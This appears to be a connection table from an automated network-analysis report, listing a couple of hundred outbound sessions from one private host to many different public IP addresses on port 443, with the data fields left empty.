                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17950192.168.2.2346044206.210.69.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17951192.168.2.2338852180.147.87.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17952192.168.2.2355428122.153.232.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17953192.168.2.2341410201.221.176.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17954192.168.2.235145895.52.120.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17955192.168.2.2336232114.115.212.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17956192.168.2.2342574130.15.98.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17957192.168.2.234423023.48.50.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17958192.168.2.23547905.2.140.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17959192.168.2.2345542183.113.2.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17960192.168.2.2357092110.117.125.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17961192.168.2.235365627.253.177.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17962192.168.2.2356638154.223.72.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17963192.168.2.2358188183.149.230.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17964192.168.2.2334614108.228.255.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17965192.168.2.2342944120.120.91.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17966192.168.2.234620225.47.5.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17967192.168.2.2337488149.112.75.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17968192.168.2.2340096202.55.159.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17969192.168.2.2359186122.245.128.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17970192.168.2.235571860.244.224.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17971192.168.2.234938665.192.193.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17972192.168.2.2338692189.139.73.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17973192.168.2.235132060.80.216.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17974192.168.2.2341608160.35.13.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17975192.168.2.235478452.152.135.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17976192.168.2.2343274137.196.245.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17977192.168.2.2355370119.165.66.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17978192.168.2.23564049.229.155.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17979192.168.2.233727675.154.229.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17980192.168.2.235886213.62.213.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17981192.168.2.236090051.1.153.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17982192.168.2.23524142.165.3.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17983192.168.2.2334400170.9.138.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17984192.168.2.235276432.26.95.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17985192.168.2.2339322101.191.162.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17986192.168.2.233629459.5.224.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17987192.168.2.2356748211.142.48.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17988192.168.2.2345386115.149.157.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17989192.168.2.235558495.234.80.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17990192.168.2.2345808103.61.194.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17991192.168.2.2349516151.13.193.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17992192.168.2.2356048140.228.29.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17993192.168.2.2343914172.60.171.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17994192.168.2.2333788139.109.115.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17995192.168.2.2352532160.99.7.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17996192.168.2.233709038.141.7.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17997192.168.2.236086860.63.124.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17998192.168.2.234074091.226.212.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17999192.168.2.234489831.177.185.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18000192.168.2.234196490.145.69.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18001192.168.2.2359372135.83.30.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18002192.168.2.2356260180.176.120.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18003192.168.2.2358668185.93.57.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18004192.168.2.233397645.202.62.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18005192.168.2.2347572123.35.163.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18006192.168.2.2335204201.198.40.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18007192.168.2.235002250.126.131.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18008192.168.2.2340858222.53.221.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18009192.168.2.2335232168.199.214.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18010192.168.2.235824059.27.121.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18011192.168.2.235358266.216.137.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18012192.168.2.2352276144.85.74.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18013192.168.2.23410605.10.238.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18014192.168.2.235424413.63.133.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18015192.168.2.2358914205.85.252.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18016192.168.2.2351254168.87.221.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18017192.168.2.2345006178.41.164.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18018192.168.2.2339962100.234.88.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18019192.168.2.2357330128.150.6.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18020192.168.2.2342666141.247.98.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18021192.168.2.2354438109.97.137.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18022192.168.2.2351246113.141.189.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18023192.168.2.234338470.180.81.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18024192.168.2.2349884186.147.200.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18025192.168.2.235000892.108.192.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18026192.168.2.2359644196.172.35.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18027192.168.2.235626853.18.227.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18028192.168.2.2335376154.15.41.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18029192.168.2.235033237.155.63.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18030192.168.2.2342286146.166.198.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18031192.168.2.233831223.135.5.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18032192.168.2.235562299.46.237.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18033192.168.2.235729495.133.40.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18034192.168.2.2356100223.255.29.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18035192.168.2.2350670223.234.237.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18036192.168.2.2355412219.16.20.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18037192.168.2.235213223.215.249.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18038192.168.2.2345018178.26.28.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18039192.168.2.2341118166.150.76.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18040192.168.2.234207651.241.249.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18041192.168.2.2352136129.174.92.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18042192.168.2.2351264220.116.226.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18043192.168.2.2352922115.135.114.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18044192.168.2.234782483.96.67.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18045192.168.2.2353464186.55.95.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18046192.168.2.233432897.27.92.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18047192.168.2.235897059.160.112.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18048192.168.2.234299040.92.114.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18049192.168.2.2339488138.235.80.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18050192.168.2.234222276.41.72.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18051192.168.2.2360248156.25.92.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18052192.168.2.2345058153.26.179.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18053192.168.2.2354036105.243.141.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18054192.168.2.233741468.214.54.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18055192.168.2.233805493.236.40.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18056192.168.2.235280080.90.221.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18057192.168.2.236011037.11.220.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18058192.168.2.2345620147.148.98.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18059192.168.2.235634674.18.246.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18060192.168.2.2355744176.248.218.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18061192.168.2.2337190217.99.90.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18062192.168.2.235367679.137.163.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18063192.168.2.2357378159.12.26.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18064192.168.2.2346408161.95.178.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18065192.168.2.2352454185.76.86.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18066192.168.2.235534665.212.238.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18067192.168.2.2342290171.128.157.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18068192.168.2.235197248.120.75.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18069192.168.2.233565659.91.72.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18070192.168.2.233729660.126.60.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18071192.168.2.2336662145.214.124.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18072192.168.2.2350692216.169.171.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18073192.168.2.234571449.46.92.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18074192.168.2.2352970135.118.180.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18075192.168.2.234708489.85.1.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18076192.168.2.2343428183.217.114.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18077192.168.2.2356144120.51.159.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18078192.168.2.235499899.147.124.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18079192.168.2.234435471.177.47.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18080192.168.2.233420075.118.129.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18081192.168.2.236075250.74.192.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18082192.168.2.233928664.66.224.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18083192.168.2.2337924187.37.104.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18084192.168.2.2341816167.86.177.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18085192.168.2.234578034.138.248.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18086192.168.2.2335960204.91.246.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18087192.168.2.2356342159.187.22.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18088192.168.2.23556088.232.118.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18089192.168.2.2337356107.68.91.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18090192.168.2.234119431.134.233.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18091192.168.2.2343024126.59.209.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18092192.168.2.2352240110.205.90.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18093192.168.2.2349214216.68.47.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18094192.168.2.234938670.37.39.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18095192.168.2.2356538133.170.177.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18096192.168.2.2333724208.45.84.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18097192.168.2.233822850.59.124.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18098192.168.2.23495924.190.212.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18099192.168.2.2333618176.198.64.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18100192.168.2.234464457.132.103.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18101192.168.2.2333022141.35.46.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18102192.168.2.233912469.11.0.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18103192.168.2.235818480.124.60.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18104192.168.2.2348182220.225.105.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18105192.168.2.2343488145.0.215.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18106192.168.2.2359174128.31.228.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18107192.168.2.235958099.78.80.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18108192.168.2.234228471.25.129.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18109192.168.2.235708264.1.29.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18110192.168.2.235115473.164.63.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18111192.168.2.234252896.49.107.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18112192.168.2.23372742.73.121.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18113192.168.2.235992277.188.172.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18114192.168.2.2342582155.44.95.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18115192.168.2.2333336110.86.206.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18116192.168.2.2334402110.148.21.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18117192.168.2.2343352195.99.167.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18118192.168.2.234857079.130.174.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18119192.168.2.2346804218.20.239.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18120192.168.2.234884659.183.245.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18121192.168.2.2340074202.79.30.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18122192.168.2.2344614165.170.150.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18123192.168.2.235244294.117.113.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18124192.168.2.235539484.251.0.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18125192.168.2.2342950160.157.178.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18126192.168.2.23492222.95.55.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18127192.168.2.235313061.251.193.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18128192.168.2.235147874.145.30.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18129192.168.2.2334000128.183.81.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18130192.168.2.2353752103.53.201.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18131192.168.2.2351098154.30.4.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18132192.168.2.234909866.222.235.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18133192.168.2.2353992122.184.7.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18134192.168.2.234168879.93.151.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18135192.168.2.2337452191.191.249.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18136192.168.2.2334712105.188.240.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18137192.168.2.2356440210.112.126.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18138192.168.2.2356980209.87.51.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18139192.168.2.235483297.94.61.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18140192.168.2.235454484.166.193.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18141192.168.2.235369676.170.137.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18142192.168.2.233928443.52.155.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18143192.168.2.233485643.147.232.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18144192.168.2.2333282208.201.99.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18145192.168.2.2334296173.234.218.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18146192.168.2.2341314181.241.252.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18147192.168.2.2360756209.75.123.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18148192.168.2.2355796176.120.176.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18149192.168.2.234706850.247.142.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18150192.168.2.2332794205.36.16.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18151192.168.2.2349490121.254.153.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18152192.168.2.2335714179.56.236.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18153192.168.2.2342374159.226.80.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18154192.168.2.2350960187.151.171.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18155192.168.2.234251038.143.42.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18156192.168.2.235810052.29.31.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18157192.168.2.2340508155.200.35.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18158192.168.2.235139078.119.114.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18159192.168.2.2360084140.192.149.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18160192.168.2.233526048.25.224.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18161192.168.2.233618440.85.73.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18162192.168.2.2360368205.130.198.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18163192.168.2.234648658.241.249.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18164192.168.2.234845014.38.119.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18165192.168.2.235506498.7.106.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18166192.168.2.2357142191.172.181.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18167192.168.2.2348780181.237.65.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18168192.168.2.23602205.205.48.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18169192.168.2.2342040132.93.107.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18170192.168.2.233967288.208.11.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18171192.168.2.234193858.66.15.248443
                                                TimestampBytes transferredDirectionData


